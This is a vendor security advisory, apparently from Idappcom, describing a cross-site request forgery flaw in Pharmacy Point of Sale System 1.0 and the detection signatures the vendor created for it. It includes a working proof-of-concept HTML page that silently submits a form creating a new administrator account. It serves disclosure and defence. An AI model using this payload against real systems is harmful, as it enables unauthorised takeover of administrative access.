Pharmacy Point of Sale System 1.0 'New Admin' Cross-Site Request Forgery



Application Details

Pharmacy Point of Sale System is a web-based application which assists with all sales transactions, as well as day-to-day transactions with all customers. This application also monitors stock availability of all products sold.


Vulnerability

Pharmacy Point of Sale System is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input.


Identification

By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to add new administrative users. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pharmacy/Actions.php?a=save_user" method="POST">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="fullname" value="Mrt" />
      <input type="hidden" name="username" value="NewAdmin" />
      <input type="hidden" name="type" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>


Detection

By turning this into traffic files and matching rules, we are able to detect attempts to create an admin user via CSRF.


Coverage

Idappcom has created signatures 8021954 and 8021955 along with traffic files.


References

Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery - Exploit Database

Pharmacy Point of Sale System 1.0 Cross-Site Request Forgery - Packet Storm Security


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can share your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional